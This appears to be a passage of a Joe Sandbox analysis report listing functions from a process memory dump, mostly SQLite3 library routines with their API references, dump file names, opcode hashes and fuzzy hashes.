                                                                                              • sqlite3_mprintf.SQLITE3 ref: 61E3C1EE
                                                                                                • Part of subcall function 61E395AF: sqlite3_initialize.SQLITE3 ref: 61E395B5
                                                                                                • Part of subcall function 61E395AF: sqlite3_vmprintf.SQLITE3 ref: 61E395CF
                                                                                              • sqlite3_free.SQLITE3 ref: 61E3C1FA
                                                                                                • Part of subcall function 61E0A119: sqlite3_mutex_enter.SQLITE3 ref: 61E0A138
                                                                                              • sqlite3_free.SQLITE3 ref: 61E3C202
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_freesqlite3_initializesqlite3_vmprintf$sqlite3_mprintfsqlite3_mutex_entersqlite3_str_vappendf
                                                                                              • String ID:
                                                                                              • API String ID: 2498652501-0
                                                                                              • Opcode ID: c8f54d1cdddcc195b3f7571da4af0d171323da3f81a4d4ff0078371e724eb73f
                                                                                              • Instruction ID: b725bf90798a4a21541a7c03a88b0b7fc61bcdac9a635251504108e54da318f6
                                                                                              • Opcode Fuzzy Hash: c8f54d1cdddcc195b3f7571da4af0d171323da3f81a4d4ff0078371e724eb73f
                                                                                              • Instruction Fuzzy Hash: 71F054716043655FD7007FAD888145EBBE8EEC8654F15C92EE888C7300E770D851C792
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E3D0E9 Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • sqlite3_value_pointer.SQLITE3 ref: 61E3D100
                                                                                                • Part of subcall function 61E0E9A3: strcmp.MSVCRT ref: 61E0E9D2
                                                                                              • sqlite3_mprintf.SQLITE3 ref: 61E3D119
                                                                                                • Part of subcall function 61E395AF: sqlite3_initialize.SQLITE3 ref: 61E395B5
                                                                                                • Part of subcall function 61E395AF: sqlite3_vmprintf.SQLITE3 ref: 61E395CF
                                                                                              • sqlite3_result_error.SQLITE3 ref: 61E3D12F
                                                                                              • sqlite3_free.SQLITE3 ref: 61E3D137
                                                                                                • Part of subcall function 61E0A119: sqlite3_mutex_enter.SQLITE3 ref: 61E0A138
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_freesqlite3_initializesqlite3_mprintfsqlite3_mutex_entersqlite3_result_errorsqlite3_value_pointersqlite3_vmprintfstrcmp
                                                                                              • String ID:
                                                                                              • API String ID: 2416658597-0
                                                                                              • Opcode ID: 64fcfb30176419ab06eff722eea7ffda97e5b94d8ee14de47079f38a0e33537c
                                                                                              • Instruction ID: 772f25b4658b8814ccd55f3d593faffd6a4ef416ec447d7624ec0c0326a2e215
                                                                                              • Opcode Fuzzy Hash: 64fcfb30176419ab06eff722eea7ffda97e5b94d8ee14de47079f38a0e33537c
                                                                                              • Instruction Fuzzy Hash: B2F03AB45083519BD340AF69888125EBAE4FFC5664F64C92DE498CB380E775C8908783
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E924A7 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • sqlite3_initialize.SQLITE3 ref: 61E924AE
                                                                                                • Part of subcall function 61E19104: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1D169), ref: 61E1913B
                                                                                                • Part of subcall function 61E19104: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E212EB), ref: 61E1916F
                                                                                                • Part of subcall function 61E19104: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1D169), ref: 61E19447
                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E924C6
                                                                                              • sqlite3_free.SQLITE3 ref: 61E924D3
                                                                                                • Part of subcall function 61E0A119: sqlite3_mutex_enter.SQLITE3 ref: 61E0A138
                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E924EF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_mutex_enter$sqlite3_mutex_leave$sqlite3_configsqlite3_freesqlite3_initialize
                                                                                              • String ID:
                                                                                              • API String ID: 3512769177-0
                                                                                              • Opcode ID: 8b4d9c97681afa23379cf456a1544c4d97ae7a28b77daa90330759cbc0e48b04
                                                                                              • Instruction ID: a7faf802cf544c64f8dd2bc6035d54d93d323ae008512c37d455a838e90a6769
                                                                                              • Opcode Fuzzy Hash: 8b4d9c97681afa23379cf456a1544c4d97ae7a28b77daa90330759cbc0e48b04
                                                                                              • Instruction Fuzzy Hash: D0E04FB0548B468BDB007FFA85C571D76F8BB8234DF15446CC5488B342F7B5C4A08792
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E2D6EB Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 441COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_strlike
                                                                                              • String ID: \$l
                                                                                              • API String ID: 933858916-789299731
                                                                                              • Opcode ID: 9a962edcbf8311a03030a1cdb42b80df691cfa5e9e9645a76dc70572ac1adefb
                                                                                              • Instruction ID: ccf0c49eb534e3c6009cbf3e0ba0a02e1b15ff3e9375ca7fdd5a26894ce87455
                                                                                              • Opcode Fuzzy Hash: 9a962edcbf8311a03030a1cdb42b80df691cfa5e9e9645a76dc70572ac1adefb
                                                                                              • Instruction Fuzzy Hash: 6712B474A042498FDB44DFA8C491BAEBBF2BF88314F248429E859EB345D779DC42CB51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E7F22C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 149COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E7F275
                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E7F765
                                                                                                • Part of subcall function 61E64B10: sqlite3_strnicmp.SQLITE3 ref: 61E64B82
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_mutex_entersqlite3_mutex_leavesqlite3_strnicmp
                                                                                              • String ID: p$a
                                                                                              • API String ID: 100587609-2774617310
                                                                                              • Opcode ID: e8d0706f19643a0c7f8fd36a22fc455bfc2c1684018ff16c6cb04a526fa07738
                                                                                              • Instruction ID: 7bfbea9d809b53a8c725440805245f1c57c2c37c067241f2b63ffe5a6789eae0
                                                                                              • Opcode Fuzzy Hash: e8d0706f19643a0c7f8fd36a22fc455bfc2c1684018ff16c6cb04a526fa07738
                                                                                              • Instruction Fuzzy Hash: 6A61E774A052598BEB20DF29C8847C9B7F0BF89308F20C4A9D859AB354D738DA95CF80
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E18F0D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 131COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_log
                                                                                              • String ID: `Aa
                                                                                              • API String ID: 632333372-4150638200
                                                                                              • Opcode ID: e800150336527023a995c349aeba7a27735e49498f2dc27530bdc5a049f79551
                                                                                              • Instruction ID: fc6d9acf59f7385389393602123b31ae3c33dcc97a3293401e3251b3429592aa
                                                                                              • Opcode Fuzzy Hash: e800150336527023a995c349aeba7a27735e49498f2dc27530bdc5a049f79551
                                                                                              • Instruction Fuzzy Hash: 8851F774A9D649DFDB00CF5CC09268A77A2FB8A350F24C82BED168B358E735D9C18B51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E06E21 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 101COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_strnicmp
                                                                                              • String ID: '$null
                                                                                              • API String ID: 1961171630-2611297978
                                                                                              • Opcode ID: ee7419b2ed7e277ff568c0bc274485698e72dff03853abf243cb134d767bdf84
                                                                                              • Instruction ID: 64db699856c926bf6f1fed903ed9a0af56a2a1003efc68821c53fcb0a314754a
                                                                                              • Opcode Fuzzy Hash: ee7419b2ed7e277ff568c0bc274485698e72dff03853abf243cb134d767bdf84
                                                                                              • Instruction Fuzzy Hash: 6E31E820A483C68EF7008EB5C465392BBD3AB9D34BFB8C169D1454B28AE675DDE64701
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E23A6D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • sqlite3_win32_is_nt.SQLITE3 ref: 61E23AA7
                                                                                                • Part of subcall function 61E18A69: InterlockedCompareExchange.KERNEL32 ref: 61E18A89
                                                                                                • Part of subcall function 61E18A69: InterlockedCompareExchange.KERNEL32 ref: 61E18AD0
                                                                                                • Part of subcall function 61E18A69: InterlockedCompareExchange.KERNEL32 ref: 61E18AF0
                                                                                                • Part of subcall function 61E189F3: sqlite3_win32_sleep.SQLITE3 ref: 61E18A4B
                                                                                              • sqlite3_free.SQLITE3 ref: 61E23B72
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: CompareExchangeInterlocked$sqlite3_freesqlite3_win32_is_ntsqlite3_win32_sleep
                                                                                              • String ID: winDelete
                                                                                              • API String ID: 3336177498-3936022152
                                                                                              • Opcode ID: ab892e8228a5b3e34b700c1a8b1b353e00f59013b3ea2d984c3764a9a89f54d5
                                                                                              • Instruction ID: d0522adf12587d15279c09fa83411bc3e7b5bea1f215481e344140adb29f2a35
                                                                                              • Opcode Fuzzy Hash: ab892e8228a5b3e34b700c1a8b1b353e00f59013b3ea2d984c3764a9a89f54d5
                                                                                              • Instruction Fuzzy Hash: FE3198B0E1875A8BEB01DFA5C89559EBBB5FF8D318F30C529E85296340D734C9428F52
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E632A6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 3
                                                                                              • API String ID: 0-1842515611
                                                                                              • Opcode ID: 0978d28bd642f22827974ce885a96dc1c4f4af1e7d2f7c2c8cdcf6307ea1d685
                                                                                              • Instruction ID: 4e5c2a4fe554e193ea55f299baa8a105126296aa7bb747c3c5bd094e21da8ecb
                                                                                              • Opcode Fuzzy Hash: 0978d28bd642f22827974ce885a96dc1c4f4af1e7d2f7c2c8cdcf6307ea1d685
                                                                                              • Instruction Fuzzy Hash: 86317A749442648BDB21CF69C8C07C9BBF4FB06718F6485A9E89C9B345D770E984CF91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E93940 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: Virtual$ProtectQuery
                                                                                              • String ID: @
                                                                                              • API String ID: 1027372294-2766056989
                                                                                              • Opcode ID: 1ae9009f3a3168a4bf2392de961bcbf4039699a472af85b23aad72ecee92efe2
                                                                                              • Instruction ID: 4142cea1e346a0175b9ecf8fb6ac01727a9c4b95edeb9471b10218aae38749d4
                                                                                              • Opcode Fuzzy Hash: 1ae9009f3a3168a4bf2392de961bcbf4039699a472af85b23aad72ecee92efe2
                                                                                              • Instruction Fuzzy Hash: E83168B2914B028FE710DFB9C58460AFBE0FF45354F64CA28E89897350E734E880CB92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E641D7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_exec
                                                                                              • String ID: -a$sqlite_stat1
                                                                                              • API String ID: 2141490097-3864893345
                                                                                              • Opcode ID: 1e1fb8abe16e5930c7912de08e3e7ef30b3fa861fe96eae353578b4ffb2ccea6
                                                                                              • Instruction ID: a894abb490d27badc722fc258bd411ce3e21d9912372ec45f0f07e9d9d0d1f72
                                                                                              • Opcode Fuzzy Hash: 1e1fb8abe16e5930c7912de08e3e7ef30b3fa861fe96eae353578b4ffb2ccea6
                                                                                              • Instruction Fuzzy Hash: 15216DB0B447428FD700DFA9C490A4ABBF9BB88768F65C96ED8589B350D734E851CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E14278 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E14295
                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E1430A
                                                                                                • Part of subcall function 61E13FAA: sqlite3_mutex_try.SQLITE3(?,?,?,61E1402A), ref: 61E13F4A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_mutex_entersqlite3_mutex_leavesqlite3_mutex_try
                                                                                              • String ID: #
                                                                                              • API String ID: 2389339727-1885708031
                                                                                              • Opcode ID: 90906a56cf3c920cd4e47eb4a956342fdf234f4ac69045aa7c1a494acdbcd53f
                                                                                              • Instruction ID: 8e493d0de31462f75456f45dbd0c2367570f3ab1cf5e6002ec9e7ee42b62a7e9
                                                                                              • Opcode Fuzzy Hash: 90906a56cf3c920cd4e47eb4a956342fdf234f4ac69045aa7c1a494acdbcd53f
                                                                                              • Instruction Fuzzy Hash: 77113334A08246CFDB04DFA9D48199AB7B0FF4A76DF65C62AF8148B304D770E991CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E03C3F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • sqlite3_stricmp.SQLITE3(00000000,?,?,61E6422A), ref: 61E03CB9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
